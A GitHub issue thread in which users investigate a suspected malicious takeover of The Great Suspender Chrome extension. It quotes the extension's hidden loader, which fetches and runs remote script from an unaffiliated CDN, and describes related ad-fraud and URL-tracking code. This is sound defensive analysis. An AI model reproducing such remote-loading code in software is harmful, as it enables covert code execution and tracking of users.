Thegreatsuspender: URGENT: SECURITY: New maintainer is probably malicious

...
This lead a few users to panic, however, on closer investigation, it appeared that _the third-party servers were part of an alternative to Google Analytics_: and the changes shipped along with a new (though unexplained, #1260) tracking deactivation. It appears that deactivation works.
...
@deanoemcke did respond to the thread, after a significant delay. _He confirmed much of what is above, including that the secret changes are limited to analytics_ and are disabled by the flag. However, he hasn't yet clarified what his relationship or basis of trust with the new maintainer is, nor has he explained why the initial post mentions a 'purchase'.
...

Are trckingbyte.com and trckpath.com part of Open Web Analytics? Because what I am seeing in @deanoemcke's post is him saying that he can't guarantee if the changes made are legitimate analytics or if they're malware:

I'm not an expert on what is legitimate analytics gathering ... and what is deemed malware.

I apologize for possibly exacerbating the "panic", but I am just asking, and trying to put a little extra emphasis on this, because when you say:

...on closer investigation, it appeared that _the third-party servers were part of an alternative to Google Analytics...

It just strikes me as sounding a little too forgiving / innocent, though I'm sure that's not your intent.

I also want to emphasize, @deanoemcke goes on to say in that post.

Giving the publisher the benefit of doubt, I would say that they have the right to collect extra analytics _so long as it is within Google's policies, and is communicated to the user_. There is a privacy policy linked on the chrome webstore (which I set up a while ago): https://greatsuspender.github.io/privacy

_Of course, this assumes that Google are aware of these changes, and also that the linked privacy policy is still accurate_.

We know that these new "analytics" were not communicated to the user. They do violate the established privacy policy. They violate Google's policies, as the information provided all over the extension's page at the Web Store is now inaccurate (owner, contact, saying the project is open source, etc) and the privacy policy itself is no longer accurate.

and @deanoemcke had previously assured us when this sale was announced:

...the project will remain open source and the code here on GitHub will continue to reflect the code published to the chrome webstore.

Although, apparently he cannot be held responsible for the actions of the current owner of the extension. But, this is why mom said you shouldn't make promises that you can't keep.

I appreciate you making this issue @TheMageKing, and I thank you for creating a more centralized location for discussion about this topic, which will hopefully reach more users and give them the information they need in order to make decisions about what to do. I apologize, because I realize much of what I said here is simply repeating what you already provided. I just felt the need to emphasize a couple of things.

Personally, I reported this extension at the Chrome Web Store on October 29, with the following:

"The extension was sold to an unknown party. This entity has "updated" the extension to v7.18 w/o publishing changes to Github. It is calling remote scripts and using remote tracking analytics, sending user information somewhere w/o user knowledge. PLEASE SEE: https://github.com/greatsuspender/thegreatsuspender/issues/1175#issuecomment-717656189 AND ALSO: https://github.com/greatsuspender/thegreatsuspender/issues/1175#issuecomment-717656189 .. Owner refuses to communicate or respond to anyone. Can only be considered as malicious/malware at this point. We have no idea what the full changes are to the code, or the ramifications of said changes."

I also reported the user @greatsuspender and the main repository to GitHub on October 29 with the following:

"This person/entity purchased the Chrome web browser extension "The Great Suspender" :

https://chrome.google.com/webstore/detail/the-great-suspender/klbibkeccnjlkjkiokjodocebajanakg

which has over 2 million users. The project is supposed to be open source, and the master repository for it is located here:

https://github.com/greatsuspender/thegreatsuspender

The announcement and information regarding the purchase/transfer is located here:

https://github.com/greatsuspender/thegreatsuspender/issues/1175

The new owner of the extension has made changes to the code, and pushed an update to the Chrome Web Store, bringing the version up to 7.18. However, they have NOT published the code changes to GitHub, and the latest release here is 7.16:

https://github.com/greatsuspender/thegreatsuspender/releases

Obviously, after the Nano fiasco, this has brought a great deal of warranted concern to the community. Despite many attempts from many people, they refuse to respond or communicate in any way with anyone. Neither does the former/original author. It has been discovered that the extension is now calling remote scripts. Please see:

https://github.com/greatsuspender/thegreatsuspender/issues/1175#issuecomment-717648105

and also:

https://github.com/greatsuspender/thegreatsuspender/issues/1175#issuecomment-717656189

The extension is now injecting a tracker which violates the Privacy Policy (also linked to from the Chrome Web Store) stated here:

https://greatsuspender.github.io/privacy

This privacy policy also has not been updated to reflect that the old owner no longer owns it, who the new owner is, or what their contact information might be. It states that the extension only uses Google Analytics, which is a lie.

The project can no longer be considered as open source, since the owner refuses to make the source open and available for review. It's my belief that this person/entity is acting in bad faith, and poses a danger to the community and to every Chrome user that installs this extension. This person has had every opportunity to clarify what is going on here, but apparently has no interest in transparency or communication.. leaving any reasonable person to wonder, why did they PURCHASE this Chrome extension?

Remote code execution w/o the user's knowledge. Code changes unpublished to GitHub, yet pushed to the Chrome Web Store. New trackers injected. Violating their own privacy policy.

Are trckingbyte.com and trckpath.com part of Open Web Analytics? Because what I am seeing in @deanoemcke's post is him saying that he can't guarantee if the changes made are legitimate analytics or if they're malware

AFAIK, Dean's intention there is to comment that he doesn't know where each user draws the line between analytics and malware. Some people might think any sort of analytics is malware: others might disagree.

As for the trckingbyte.com and trckpath.com paths, they are not involved. They were found in other extensions, but do not appear in the distributed Great Suspender. My comment on the other thread explains what they are, and how they are not related to open web analytics (Okay, they are, but related as "Hackers rewriting open-source software for malicious purposes", not "Official part of system")

I apologize for possibly exacerbating the "panic", but I am just asking, and trying to put a little extra emphasis on this, because when you say:

...on closer investigation, it appeared that _the third-party servers were part of an alternative to Google Analytics...

It just strikes me as sounding a little too forgiving / innocent, though I'm sure that's not your intent.

Actually, it was. The open web analytics system, host of owebanalytics.com, really is a google analytics alternative. The code is hosted on a github repo with 1.3k stars, and there are people elsewhere who like it. The only reason I said "appears to be" is because I am quite busy, and I didn't have time to try and conduct any sort of detailed probe beyond that the website existed and wasn't written by a poor English speaker.

I also want to emphasize, @deanoemcke goes on to say in that post.

Giving the publisher the benefit of doubt, I would say that they have the right to collect extra analytics _so long as it is within Google's policies, and is communicated to the user_. There is a privacy policy linked on the chrome webstore (which I set up a while ago): https://greatsuspender.github.io/privacy
_Of course, this assumes that Google are aware of these changes, and also that the linked privacy policy is still accurate_.

We know that these new "analytics" were not communicated to the user. They do violate the established privacy policy. They violate Google's policies, as the information provided all over the extension's page at the Web Store is now inaccurate (owner, contact, saying the project is open source, etc) and the privacy policy itself is no longer accurate.

Indeed. This is the biggest reason why I am saying that they "appear malicious": those actions are major red flags, and it is sufficiently suspicious to justify a lot more scrutiny and skepticism than simple mistakes. But there is not yet evidence that they are actually malicious: everything can still be well explained by stupidity.

I'm not saying everything is rosy; there are major problems, right now. But it doesn't appear that we should start fearing for the safety of our passwords.

and @deanoemcke had previously assured us when this sale was announced:

...the project will remain open source and the code here on GitHub will continue to reflect the code published to the chrome webstore.

Although, apparently he cannot be held responsible for the actions of the current owner of the extension. But, this is why mom said you shouldn't make promises that you can't keep.

Yeah, mom seems to be right about a lot.

I appreciate you making this issue @TheMageKing, and I thank you for creating a more centralized location for discussion about this topic, which will hopefully reach more users and give them the information they need in order to make decisions about what to do. I apologize, because I realize much of what I said here is simply repeating what you already provided. I just felt the need to emphasize a couple of things.

Fair enough. I think I will edit that top post, to reflect some of this.

Personally, I reported this extension at the Chrome Web Store on October 29, with the following:

I, too have reported this on the web store. As a general rule, Google has more powers to remediate than Github: given that the source on Github is innocent, I doubt they will do much

I'll also respond to your comment in the other thread here, to condense this discussion more.

@TheMageKing, my comment was in reply to @ossilator's comment here, not to you. Regardless:
Oh, I know. I wanted to clear up some of your confusion.

... The extension is not directly connecting to the trck.... domains. It lacks the permissions to do so, -=-=-= AFAIK =-=-=-. Those sites are definitely malicious: they are hosted via a bitcoin hosting company, and were found in malicious extensions.
...

Honestly, it's nothing personal, but this is exactly the problem. You DO NOT KNOW.

You might not be able to tell, but I hedge what I say quite a bit. I am not a Javascript developer, though I do comprehend it perfectly well. Nor do I design manifests for chrome applications.

By my understanding, based on a reading of the documentation on the subject, Google requires that all websites which the extension can connect to be independently specified in the manifest.json. In the section that I understand to control that, many sites are listed, including google-analytics.com, stats.g.doubleclick.net (the google analytics sites), and cdn.owebanalytics.com. The trck paths are not there, nor does the word 'trck' even appear anywhere in the distributed code.

So while I don't know, I can say that I am as certain as I can be, short of a Google developer stating otherwise.

-=-=-=-=-
On a completely unrelated note, I received an email notification at 7:51 Eastern Time that @danupo had commented :

"It looks like there is a "keypressEventHandler" defined that tries to steal the password with external javascript.
In addition, the "getPassword" function and other functions are defined.

As Japanese law prohibits putting any part of the malware code on it, could someone please check this?"

But, for some reason, I cannot find that comment here. @danupo, what's up?

I got that same notification: however, I found no evidence of those functions when I checked. It was very weird. I'm not certain of how to check on the event handler, but I did verify that no "getPassword" function was defined.

Thanks @TheMageKing. I'm just going to stfu and stop commenting about this entire situation because I'm obviously pissed off about the whole thing and my incivility isn't deserved or beneficial to anyone. Genuinely apologize to you and anyone else I may have been rude to. Good luck to all.

You were fine: this is a pretty scary thing going on here.

I would like to share my own decision and how it worked for me. THe answer is quite well without TheGreatSuspender so far!

After hearing what has happened, I feel very uncomfortable about TheGreatSuspender even though I really enjoyed it up to now. A quick check shows domains with bitcoin in the name and there is a strong attempt to remain anonymous. There is no way I can trust it. I have used TheGreatSuspender along with Tabs Outliner which I also love.

I decided to buy a Pro license from the author, Vladyslav Volovyk who I found is in the Ukraine. Even though there have been rumors and posts on the extension site, even quite recently about the it being abandonware due to lack of responses, I have found posts by the author elsewhere and he strikes me as being an okay and honest programmer. I cannot hold it against someone if they do not want to dedicate their life to something, and I think it is not abandonware. I decided I trust him far more than TheGreatSuspender, it works offline, and I want the automatic downloads and extra functionality of the non-free version.

I bought Tabs Outliner pro version for about US$14 with a VISA card and it was instant gratification (even though a week ago someone said they could not purchase.) Chrome on a 2019 Macbook Pro. It works great and has automatic backup both local and to Google Drive. I just wanted to post here and let you know I have just converted over 1000 tabs, which means going to each window and unsuspending them, then in Tabs Outliner just click the X to close the entire window. And maybe type a note to name the window, or not. Poof! All those minimized windows from TGS are gone. I started feeling lighter. But the pages can be reopened from the Internet obviously. I think you can even save a downloaded page to it, and you can write notes in the tab bookmark tree and so on. I had seen Chrome slowing everything down (surprising on a new Mac) to the point I had started using Safari in parallel. Well, I saved over 1.5GB according to the Chrome task manager and I feel a lot safer.

I noticed that actually Tabs Outliner even saves windows that had crashed a long, long time ago. But they also were TheGreatSuspender links. So now I am going to each ghost of a crashed window, restoring it from the net or not, and clearing it all out. When done I will fully deactivate and uninstall TheGreatSuspender.

Hope my experience helps. Tabs Outliner works fine in free mode and I have never lost data with it, though somewhere I saw written that Chrome's storage is not bulletproof. At any rate I feel quite happy with my decision and I think TGS anyway was getting unwieldy at 1000 tabs. This was a good opportunity to lose some weight.

p.s. as far as storage not being bulletproof I can confirm that some windows that had been suspended with The Great Suspender recently did not survive a chrome crash - TGS was unable to restore them. So frankly, I think the idea of Tabs Outliner is superior to TGS even though it doesn't have the cute anime eyes. Good luck everyone, I do hope some resolution is found and the new pruchaser just turns out to be clueless, but I doubt it. Injecting anything into my data along with the other scary stuff mentioned by others is just not acceptable when I use this computer for work. I feel better without TGS.

This is concerning, so I too have migrated away from The Great Suspender. I can recommend Tabs Outliner as a good replacement.

Thanks guys!!! I think that's definitely the kind of extension I was looking for due to my heavy use of tabs and "contexts" (i.e. links open from the same page). Will try & adopt for sure!!!

For anyone who is concerned by the "stealth tracking" (i.e. it not being mirrored on Github for some reason), you can always install from source. It is easy: go to chrome://extensions, enable developer mode, click "Load unpacked extension" and point it to the src folder from this repo. Done!

HOWEVER, I DON'T SEE THE CURRENT ISSUE (in itself) AS A REASON TO FREAK OUT:

1. The third-party JS is loaded from OpenWebAnalytics CDN, so it should not be able to do anything bad? I'm not 100% sure, but:
2. It does not even get loaded if you tick that "Automatic deactivation of any kind of tracking" checkbox in settings:

var owa_baseUrl = 'https://cdn.owebanalytics.com/';
var owa_cmds = owa_cmds || [];
function loadOpenWebAnalytics(version) {
  owa_cmds.push(['trackPageView']);
  (function () {
    var _owa = document.createElement('script');
    _owa.type = 'text/javascript';
    _owa.async = true;
    _owa.src =
      owa_baseUrl +
      'owa/modules/base/js/owa.tracker-combined-latest.minified.js?siteId=klbibkeccnjlkjkiokjodocebajanakg&apikey=2cf3d852ab70d359456ce3a0aac237a3&v=' + version;
    var _owa_s = document.getElementsByTagName('script')[0];
    _owa_s.parentNode.insertBefore(_owa, _owa_s);
  })();
}

function init() {
  if (!gsStorage.getOption('trackingOptOut')) {
    loadGoogleAnalytics(
      window,
      document,
      'script',
      'https://www.google-analytics.com/analytics.js',
      'ga'
    );

    let details = chrome.runtime.getManifest();
    loadOpenWebAnalytics(details.version);
  }
  gsAnalytics = gsAnalytics();
}

This is from the actual extension installed from the chrome store, 'trackingOptOut' option is set by that checkbox, and loadOpenWebAnalytics() isn't referenced anywhere else.

Yes, this is weird that they "hid" it like that. Might have to do with the hardcoded siteId and apikey, or maybe they "just wanted to experiment with it" (on users' machines, yes, but how else do you experiment with tracking?)

Yes, they handled their PR horrendously, but that doesn't mean they are automatically malicious! (And actually, "any PR is good PR". If it spreads and then it gets proven they did nothing malicious, then more people might use the extension and more would donate to them.)

Personally, I'm going to use the "developer mode install" option, but not to avoid that tracking. Mostly because of #1259 and other autoupdate-related issues, as developer-mode extensions don't get autoupdated.

Okay, as was mentioned on the other issue, the CDN isn't affiliated with OpenWebAnalytics so it can, in theory, serve anything.
However, it can still be disabled with that checkbox.
And, technically, I don't think they are violating GPL: The extension literally is the src folder in case of this repo, you can't run it without having the sources, and it also functions substantially without the thirdparty JS library.

@evg-zhabotinsky The GPL violation was a stretch, only important we needed a way to poke the maintainer. Further, the extension on the web store is not just the src folder of this repo: there is a significant difference in the manifest.json.

@TheMageKing Yes, it _is_ a _modified_ version of the src folder. The point was that you received the modified "sources" when installing the extension so the modifications don't violate GPL.

to fulfill the license terms, the sources must be complete and in the preferred form. it is not sufficient for satisfying the license that the code can be easily inspected or the complete source pieced together from different sources. this is very much a license violation that any copyright holder on the source can use as leverage, be it to get the extension out of the store, or to kill the (shell) company @deanoemcke has clearly signed an NDA with (i'm assuming that he at least checked that it _is_ a real company). a relevant association like the software freedom conservancy might help with the legalese.

on the technical side, Somebody (TM) should have a look at the jQuery code loaded by the downloaded OWA code - according to https://adguard.com/en/blog/over-20-000-000-of-chrome-users-are-victims-of-fake-ad-blockers.html that's where the malice was hidden in the previous incidents.

Hi, I am an user of "The Great Suspender" extension for the Google Chrome browser.

My system currently has version 7.1.6 installed of the TGS. And I'm getting the pop-up tabs telling me to upgrade TGS. I do not want to upgrade TGS, much less after reading this thread here.

I have several questions:
1) Can I keep using version 7.1.6 of TGS? How do I stop it from requesting to be updated, as it is doing now in my system?
2) A general question about Google Chrome: Is it true that if I enable "developer mode" inside Google Chrome extensions settings, then no extension will be automatically updated without my manual intervention?

2. A general question about Google Chrome: Is it true that if I enable "developer mode" inside Google Chrome extensions settings, then no extension will be automatically updated without my manual intervention?

Unfortunately you can't disable automatic updates for Chrome or its extensions.

1. Can I keep using version 7.1.6 of TGS? How do I stop it from requesting to be updated, as it is doing now in my system?

It seems the only "sane" way to stop updates to an extension is to install it from source. And it is easy: Download this repository, go to chrome://extensions, enable developer mode, click "Load unpacked extension" and point it to the src directory. Done!
To switch from one instance of extension to the other, I clicked "unsuspend all tabs in all windows" (took a while for over 100 of them), manually copied extension settings, and finally deleted the one from chrome store.

1. Can I keep using version 7.1.6 of TGS? How do I stop it from requesting to be updated, as it is doing now in my system?

It seems the only "sane" way to stop updates to an extension is to install it from source. And it is easy: Download this repository, go to chrome://extensions, enable developer mode, click "Load unpacked extension" and point it to the src directory. Done!
To switch from one instance of extension to the other, I clicked "unsuspend all tabs in all windows" (took a while for over 100 of them), manually copied extension settings, and finally deleted the one from chrome store.

Thanks. I'm doing as you say, and indeed it is easy to install the extension from source once you get the gist of it.

This way, I will keep using The Great Suspender version 7.1.6 installed from source, and let it be at that version. If it works, it needs no fixing nor upgrading! :-)

If you want to report the extension you can simply write this: @TheMageKing

The extension was sold to an unknown party. This entity has "updated" the extension to v7.18 w/o publishing changes to Github. It is calling remote scripts and using remote tracking analytics, sending user information somewhere w/o user knowledge. PLEASE SEE: #1175 (comment) AND ALSO: #1175 (comment) .. Owner refuses to communicate or respond to anyone. Can only be considered as malicious/malware at this point. We have no idea what the full changes are to the code, or the ramifications of said changes.

github.com//issues/1175#issuecomment-717656189

github.com//issues/1175#issuecomment-717656189

Any alternative packages recommended?

My understanding is that 7.1.6 is the last stable one, but I am not an expert.

I kind of just want to hop off this train altogether at this point, to be honest.

Any alternative packages recommended?

I've been using Tabs Outliner for a couple of weeks now, and I'm really happy with it. I even bought the paid version!

Same here, I have not actually deinstalled GSP yet but have told it to never sleep tabs. I will deinstall it after making sure no past history is desired (since Tabs Outliner knows about long ago slept and crashed tabs too.) Tabs Outliner is working wonderfully well (paid version) and actually has made my work faster since I need to do a lot of research online while working. With the automatic backup both local and to google (not sure where it saves though), and being able to organize pages into folders, closing windows and just opening them from the outliner window when needed it is much better organized and I no longer constantly trend back to 1000 tabs. I can close the window/tabs from Tabs Outliner and it will remember them for later.

the new web store release 7.1.9 does not contain the presumably malicious code any more. that might be a reaction to the fact that MS Edge started blocking the extension. but note that the permissions in the manifest have not been revoked.

I can confirm what @ossilator says, but my system has yet to automatically update (though the new version is listed on the chrome web store). The new version no longer loads code from owebanalytics.com, as far as I can see, but I still don't trust it.

Why not simply sticking with the version that was before the change? It was great as far as I saw.

Tabs Outliner is working wonderfully well (paid version) and actually has made my work faster since I need to do a lot of research online while working. With the automatic backup both local and to google (not sure where it saves though), and being able to organize pages into folders, closing windows and just opening them from the outliner window when needed it is much better organized and I no longer constantly trend back to 1000 tabs. I can close the window/tabs from Tabs Outliner and it will remember them for later.

Unfortunately since Chromium-like browsers don't allow extensions to persist tabs, Tabs Outliner too only can offer bookmarks: no scroll position, no back/forwards history.
I didn't have the best time with https://chrome.google.com/webstore/detail/scrollmark-autosave-scrol/gekidlkidjohjompjafiphdpgejjgklo?hl=en ; I didn't try https://chrome.google.com/webstore/detail/scrollmarks/dhgphpilnllknnoaafmgobkmnialglad?hl=en .

Also, I recently removed Tabs Outliner because of how much it was slowing down my Chrome. Perhaps a non-issue if you don't actually open all that many tabs at the same time.
(And there's the annoying duplication bug if you don't close all windows and rather make Chrome restore the session on startup)

My attempt to remove tracking, notifications & permissions from the latest v7.1.8, for those interested in testing a privacy-preserving version of this plugin.

https://github.com/aciidic/thegreatsuspender-notrack

I've also removed The Great Suspender and installed Auto Tab Discard instead. But looks like Auto Tab Discard lacks of session management feature, which was very helpful with The Great Suspender when Chrome fails to restore lost tabs after an unexpected crash/shutdown etc. Are any of you aware of a good alternative that has this feature?

If we have no alternative that has this feature, maybe we, as migraters from The Great Suspender, can create a feature request at Auto Tab Discard repo.

Session Buddy is one alternative. Extensions to replace the session management features were discussed in the other issue @cagdas001 :)

... Are any of you aware of a good alternative that has this feature? ...

You can always just install version 7.16 of The Great Suspender directly from the source. Works fine.

Because I know absolutely nothing about programming, but still didn't want the (fairly innocuous imo) Google Analytics, which was _always_ present in TGS, and the option to disable it is not present in v7.16, I opened the gsAnalytics.js file located in src\js with NotePad++ and changed line 146 from:

'https://www.google-analytics.com/analytics.js',

To:

'https://0.0.0.0/',

Which threw some error when I then installed TGS, but everything works completely as expected. All of the experienced people here, please don't be too brutal with me lmao, as I'm sure this was a very stupid way of doing things, but again.. zero knowledge of programming anything.

Version 7.16 can be obtained here:

https://github.com/greatsuspender/thegreatsuspender/releases/tag/v7.1.6

Instructions for installing it directly from the source code (very easy!) are in the README for the extension, located here:

https://github.com/greatsuspender/thegreatsuspender#install-as-an-extension-from-source

If you choose to install 7.16, make sure that you unsuspend all suspended tabs before disabling / removing the current version.

You may also/alternatively want to consider @aciidic 's fork of the extension, with analytics _properly_ (lol) and other annoyances removed, located here:

https://github.com/aciidic/thegreatsuspender-notrack

I haven't tried it yet, but definitely want to thank @aciidic for it!

Good luck.

Perhaps unrelated, but will put here anyway. One of my friends had their email compromised in early Dec 2020 with having this extension (amongst others) installed on Chrome.

I vaguely remember that newer Chrome versions automatically “suspend” tabs from RAM? So if all I care about is performance (not tab organization), why do I need an extension?

I vaguely remember that newer Chrome versions automatically “suspend” tabs from RAM? So if all I care about is performance (not tab organization), why do I need an extension?

Because Chrome's suspension isn't terribly aggressive, isn't as efficient, and will reload a tab if you accidentally open it momentarily.

Thanks for bringing this up. I have wiped this extension from all of my devices + sent an abuse report to Google. I at least suggest you to report abuse.

there is no point in sending more abuse reports. the owner was caught, they backed out the questionable code, and until they make another attempt in presumably many months, there is no grounds for complaining to google. being a terrible maintainer is no policy violation.

as for the technical merits of TGS, it offers more control over (un-)suspension than chrome's built-ins, as @TheMageKing already pointed out. but chrome's tab discarding _is_ more effective than TGS's "classical" suspending - which is why TGS will use discarding when appropriate and enabled (option "Apply Chrome's built-in memory-saving when suspending").

@ossilator
That sounds like a great way to get hit with malicious code X months down the line to me.

Do you really think someone who attempted to do something malicious after being caught is just going to go "oh, I guess I was doing something malicious, didn't know that, I guess I shouldn't!"?

A mysterious new owner that want to remain anonymous, never interacted with the community and silently updates store's build without corresponding commits to the repo?
Right, this great extension is now officially a virus provider.

Should we point out that this extension is GPLv2 and that the new owner obviously violated the license?
How do we retaliate against license violation? Complain to GitHub? Google?

the point is that we currently have no leverage against them, as they aren't violating any webstore requirements (not even the license, see your #1288). and until they provably carry out an attack which gets them banned, the 2+ million users will remain vulnerable to that attack. google clearly considers that acceptable, as otherwise they'd have already acted. one can only hope that internally they flagged the extension, so they'd block any update that appears even
slightly suspicious.

of course i installed the extension from git, but this is a luxury only a few privileged people can afford.

Well this is terrifying. I'm no infosec guru, but if someone's pushing releases without updating the git or even the manifest, I'd be shutting the whole thing down NOW, no one in or out (metaphorically, in this case)
Is there any way to shut them out, or will we have to Martin Luther the repo?

I'm not sure anyone really notified Google.

I sent a report to Google via the "Report abuse" ("Missbrauch melden" in German) button on extension page. I'm sure that I'm not the only one.

Everyone who also reported the extension to Google could react to this comment with a rocket 🚀 reaction.

the point is that we currently have no leverage against them, as they aren't violating any webstore requirements (not even the license, see your #1288). and until they provably carry out an attack which gets them banned, the 2+ million users will remain vulnerable to that attack. google clearly considers that acceptable, as otherwise they'd have already acted. one can only hope that internally they flagged the extension, so they'd block any update that appears even
slightly suspicious.

of course i installed the extension from git, but this is a luxury only a few privileged people can afford.

Would Google have previous versions? This is such a clear violation of trust that it ought to be enough to pull the entire extension down.

I’ve spent a bit of time inspecting the owa.tracker-combined-latest.minified.js loaded from cdn.owebanalytics.com by v7.1.8 of the extension (and removed in v7.1.9) – will have to stop now but sharing the details of my findings for others to feed back on / if someone wants to spend more time on this.

TL;DR; the code published in v7.1.8 associates this extension with other extensions that I would consider to be likely adware or malware, either because they contain things I find questionable, or are related to now-unpublished extensions that had even more questionable "phone home" features, and have been reported to inject ads.

• As far as I can see this owa.tracker-combined-latest.minified.js file loaded in v7.1.8 is almost identical to one from the source of Open Web Analytics v1.6.2, owa.tracker-combined-min.js. There are two differences. Edit: here is the diff between v1.6.2 and the TGS version.
• There is further minification on the file. As far as I can tell this is just more advanced JS minification, no obfuscation going on.
• There is a hard-coded siteId, which doesn’t match the siteId set as a query parameter of the script URL in the extension’s source. Apparently this is meant to identify the property being tracked, like the Tracking ID in Google Analytics.

The siteId in question is bacakpdjpomjaelpkpkabmedhkoongbi – this is actually the ID of another extension in the Chrome Web Store called Video Downloader professional.

This one file, along with its different minification and hard-coded site id, is an exact match to the file of the same name / path served from the static.trckingbyte.com and static.trckingbyte.com domains – initially mentioned in https://github.com/greatsuspender/thegreatsuspender/issues/1175#issuecomment-717661094. Those domains are present in the source of different extensions – Auto Refresh Premium, and Stream Video Downloader. I can only guess why one extension’s ID would find itself in other extensions, on different domains – it suggests they’re related, perhaps made by the same person / group of people, but it could also be accidental.

From there, I took a look at those other extensions, starting with Video Downloader professional.

• Video Downloader professional opens a tab onto another extension’s store page on install, Video Downloader Plus. That extension also seems to offer a SaaS online download service.
• Both have a web page they show when attempting to download videos from YouTube, which displays ads.
• Video Downloader professional’s store privacy policy page links to http://4kdownloader.net/, which itself references another extension ID that is no longer available on the store, kmdldgcmokdpmacblnehppgkjphcbpnn.
• Installing that older kmdldgcmokdpmacblnehppgkjphcbpnn extension, its "YouTube download page fallback" links to a download page for a Windows .exe YouTube video downloader.
• Oh and – comparing both the old and new extensions, the old version contained hundreds of lines of code with "phone home" / background request / chain redirect / domain blacklist features. This isn’t my area of expertise but to untrained eyes this looks as fishy as it gets, particularly since as far as I can tell the "background processing" and "video download" codes are completely independent of one-another (!?). I’ve made the source available here should someone else want to investigate: https://gist.github.com/thibaudcolas/698e737ce9065bece1f77e12ef38b782.

I’ll stop there. Googling all those extensions, there are references to malware, although it’s not always clear whether they are false positives or not. Taking a brief look at their code / sites, it’s a similar web of at-best questionable practices (unclear who the authors are, links to phishy-looking sites, lack of an apparent business model).

Back to The Great Suspender and its new-but-now-gone tracking script – the script currently served by those domains does look like an innocuous Open Web Analytics tracker script. It could well be selectively serving the innocuous script, and on occasion switch over to a more malicious payload. Or it really could just be added tracking. Based on the association with those other extensions, I’d expect TGS will eventually switch to have a similar business model – stay low-profile long enough so people here move on, then cash in on whoever is left unaware of the change of direction.

Thanks to all who have been investigating this and spreading the word about it.

We should consider that, if the new owner of the extension and this repo is indeed malicious (and, from a security perspective, one should assume hostile intent, given what's transpired so far), it's likely that the discussion on this issue will be locked and deleted by him at some point. In order to continue the investigation and preserve what's been found so far, the discussion thus far should be mirrored somewhere, and further discussion should probably be held elsewhere. Perhaps someone who's forked the repo could host an issue in their repo, or maybe it could take place on a Gist (if it's to stay on GitHub).

Not perfect, but here's an imgur screenshot backup: https://imgur.com/a/q7IbkCr

https://archive.is/Em1wb

https://archive.is/jdSWW

I’ve made the source available here should someone else want to investigate: https://gist.github.com/thibaudcolas/698e737ce9065bece1f77e12ef38b782.

I'm currently going through the code and writing up a description of its behaviour, and will report back with more details soon.

I've published a more readable version of the code here: https://gist.github.com/joepie91/fa55c936438bab8bb977e008e8be82f2

Most parts of the code are remotely configurable, can be rate-limited, and so on.

The general functionality of the code is:

• Intercepts all requests to:
  
  
  
  • Strip out certain response headers (config.validateFields, string)
  
  
  • Strip out the Referer header from every request
  
  
  • Optionally add in a fake Referer header based on configuration rules (against the current URL, what page the request originates from, etc.)
  
  
• Intercepts all pageloads, to:
  
  
  
  • Report their URLs to the API server (max. once every 2 hours per domain), but only for those domains in a remotely-configured list (/coverage API)
  
  
  • Generate a new URL, from an affiliate URL template + the request URL, then:
    
    
    
    
    
    • Request that URL and optionally receive a new URL in response
    
    
    
    • Either load that URL in the background, or in a new tab
    
    
    
  
  

Possible and likely usecases:

• 'Competitor analytics', basically tracking how much traffic competitors get, by tracking requests to their sites
• Advertising fraud (through background requests to advertising servers)
• Adware (by opening new tabs with ads)
• Affiliate fraud (through Referer header manipulation/injection)

__Edit:__ To be clear, these are the risks to you as the user, currently:

• Operator may receive a log of every URL you load, ie. your browsing is not private
• Your browser becomes involved in advertising/affiliate fraud, which may also get you blocked from sites
• You may start seeing ads in new tabs

@joepie91 Any risk of password capture? The permission to read/modify data is needed to be able to read out from form elements (say for a login page).

@nmichaud I have not seen any code that could do so, in the code provided by @thibaudcolas, and there does not seem to be any "execute arbitrary JS" functionality in there either.

That having been said:

• As I understand it, that code originates from a different extension (Video Downloader), and I have not verified whether the malicious code in this extension is exactly the same.
• As long as the extension is owned by a malicious party, it's always possible for them to push an update later that can steal passwords. Likewise, they may have pushed an update that does so in the past (and removed the functionality later) that noone has noticed yet.

If the malicious code in this extension comes from the same source as Video Downloader, then most likely your passwords will not have been at risk, also because the publisher mainly seems interested in various forms of large-scale advertising fraud, and accounts aren't often useful there.

But there's no way to be 100% sure without going through the release history of the extension, and verifying that none of them contained any additional malicious code (which I unfortunately don't have the time for today).

UPDATE: This conclusion turned out to be possibly-wrong. See below.

@thibaudcolas @joepie91 Thank you both for the detailed analysis! I have edited the top post to reflect it.

As for @thibaudcolas's idea that people will move on: bad news! Until I added 'urgent' to the title, the thread basically died: people have been reporting other, new issues to the repository, which tells me nobody notices when it just says "security". In short, they're doing quite well at acheiving their goal of 'getting everyone to forget', by literally doing nothing.

That said, @joepie91, keep in mind that the suspicious code posted by @thibaudcolas isn't part of the extension. The extension (contained) code to download and execute javascript from a remote, suspicous-looking server: that is what you analyzed. It is already executing arbitrary JS; and while the latest update removed that (we think), it can be brought back anytime.

That said, @joepie91, keep in mind that the suspicious code posted by @thibaudcolas isn't part of the extension. The extension (contained) code to download and execute javascript from a remote, suspicous-looking server: _that_ is what you analyzed. It is already executing arbitrary JS; and while the latest update removed that (we think), it can be brought back anytime.

Aha, I missed that detail. In that case, yes, it's possible that anything could have been run, including password-stealing code :(

(It actually kind of baffles me that extensions are allowed to access the extension API from downloaded code, then, but that's a whole separate discussion...)

it's likely that the discussion on this issue will be locked and deleted by him at some point

Possible, but that would basically instantly confirm the suspicion, and the majority of possibly targeted users that are less tech-savvy would not see this thread anyway. It seems zero communication would actually be an effective strategy given malicious intent, which makes it even more valuable that there are people monitoring and analyzing the releases :clap:

@thibaudcolas @joepie91 Thank you both for the detailed analysis! I have edited the top post to reflect it.

As for @thibaudcolas's idea that people will move on: bad news! Until I added 'urgent' to the title, the thread basically died: people have been reporting other, new issues to the repository, which tells me nobody notices when it just says "security". In short, they're doing quite well at acheiving their goal of 'getting everyone to forget', by literally doing nothing.
[snip]

No doubt you're all already aware, but this was circulated by a number of Infosec Twitter accounts yesterday, which is how I learned of it, so it's getting some wider exposure.

But there's no way to be 100% sure without going through the release history of the extension, and verifying that none of them contained any additional malicious code (which I unfortunately don't have the time for today).

Also since they control the endpoint where the code was fetched, they could have substituted a malicious payload at any time and likely it would never be caught (I wonder how much data is provided by client-side fetch code - like the recent event-stream issue (https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets), its possible this change could have been targeted at a particular user of TGS).

No doubt you're all already aware, but this was circulated by a number of Infosec Twitter accounts yesterday, which is how I learned of it, so it's getting some wider exposure.

Yes it is now in Life Hacker. Keeping the new maintainer's identity secret is downright irresponsible and unethical given the likelihood of a malicious maintainer and the extension having over 1M+ installs.

